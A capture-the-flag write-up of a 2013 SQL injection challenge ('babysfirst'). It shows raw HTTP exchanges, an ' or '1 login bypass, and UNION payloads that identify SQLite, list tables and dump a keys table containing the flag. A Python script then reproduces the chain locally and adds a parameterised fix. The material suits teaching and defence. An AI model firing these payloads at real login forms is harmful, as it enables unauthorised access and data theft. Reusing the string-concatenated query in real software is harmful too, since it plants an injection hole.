URL: http://babysfirst.shallweplayaga.me:8041
Type: SQL injection
Solution: literally online lolling on line WucGesJi
Let's inspect the HTTP exchange when we submit the username admin with an empty password:
POST /login HTTP/1.1
Host: babysfirst.shallweplayaga.me
Content-Type: application/x-www-form-urlencoded
Content-Length: 24

username=admin&password=
--------------------------------------------------------------------
HTTP/1.1 403 Forbidden
Date: Mon, 17 Jun 2013 15:54:46 GMT
Transfer-Encoding: chunked
X-Sql: select name from users where name = 'admin' and password = '' limit 1;
Content-Type: text/html; charset=utf-8
The result is 403 Forbidden, but the X-Sql: header gives us the exact SQL statement the server executed, with our input pasted straight into the string. Let's try a basic SQL injection:
POST /login HTTP/1.1
Host: babysfirst.shallweplayaga.me
Content-Type: application/x-www-form-urlencoded
Content-Length: 31

username=admin&password='+or+'1
--------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Mon, 17 Jun 2013 15:58:29 GMT
Transfer-Encoding: chunked
X-Sql: select name from users where name = 'admin' and password = '' or '1' limit 1;
Content-Type: text/html; charset=utf-8
Success!
-> logged in as root
Note that we end up as root rather than admin: the injected or '1' makes the WHERE clause true for every row, and limit 1 then returns the first row of the users table. So the login is vulnerable, but we still have to find the key…
In the payloads below the trailing -- comments out the ' limit 1; that the server appends, so the UNION is not truncated; the page still only displays the first row of the result, which is why each payload reveals a single value.
- First I thought it was the root password, but that doesn't work:
  username=admin&password=' union select password from users --
  -> logged in as barking up the wrong tree
- So I tried to find out which SQL engine was used. I got a successful hit with SQLite:
  username=admin&password=' union select sqlite_version() --
  -> logged in as 3.7.9
- We can then list the tables (the first row of sqlite_master is shown):
  username=admin&password=' union all select name from sqlite_master --
  -> logged in as keys
- And then dump the keys table:
  username=admin&password=' union all select * from keys --
  -> logged in as The key is: literally online lolling on line WucGesJi
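The whole chain above, reproduced locally against an in-memory SQLite database so the effect of each payload can be checked without the server, and followed by the hardened query. This is an added example, not the challenge's own code: the table schema, the row contents (the admin password in particular is invented) and the function names make_db, build_query, vulnerable_login, injected_rows and safe_login are assumptions chosen to reproduce what the X-Sql header showed.

```python
# Added example (not the challenge's own code): local reproduction of the
# babysfirst login injection against an in-memory SQLite database, plus the
# hardened form of the query. Schema, rows and names are assumptions.
import sqlite3


def make_db():
    """Constructed sample data approximating the challenge's tables."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE keys (value TEXT);
        INSERT INTO keys VALUES
            ('The key is: literally online lolling on line WucGesJi');
        CREATE TABLE users (name TEXT, password TEXT);
        INSERT INTO users VALUES ('root', 'barking up the wrong tree');
        INSERT INTO users VALUES ('admin', 'not-the-flag');  -- invented
        """
    )
    return conn


def build_query(username, password):
    """The query exactly as X-Sql showed it: form values pasted into SQL."""
    return (
        f"select name from users where name = '{username}' "
        f"and password = '{password}' limit 1;"
    )


def vulnerable_login(conn, username, password):
    """Mimics the server: first column of the first row, or None (the 403)."""
    row = conn.execute(build_query(username, password)).fetchone()
    return row[0] if row else None


def injected_rows(conn, username, password):
    """Everything the injected query really returns; the page shows row 1."""
    return [r[0] for r in conn.execute(build_query(username, password))]


def safe_login(conn, username, password):
    """Hardened form: bound parameters, so input can never become SQL."""
    row = conn.execute(
        "select name from users where name = ? and password = ? limit 1",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    for payload in (
        "",
        "' or '1",
        "' union select password from users --",
        "' union select sqlite_version() --",
        "' union all select name from sqlite_master --",
        "' union all select * from keys --",
    ):
        print(repr(payload), "->", vulnerable_login(db, "admin", payload))
    print("all tables:",
          injected_rows(db, "admin", "' union all select name from sqlite_master --"))
    print("hardened login with ' or '1:", safe_login(db, "admin", "' or '1"))
```

The bypass payload lands on root because or '1' binds looser than and, turning the condition into (name = 'admin' and password = '') or '1', which every row satisfies; the parameterised version returns None for the same input because the quote is passed as data, not as SQL syntax.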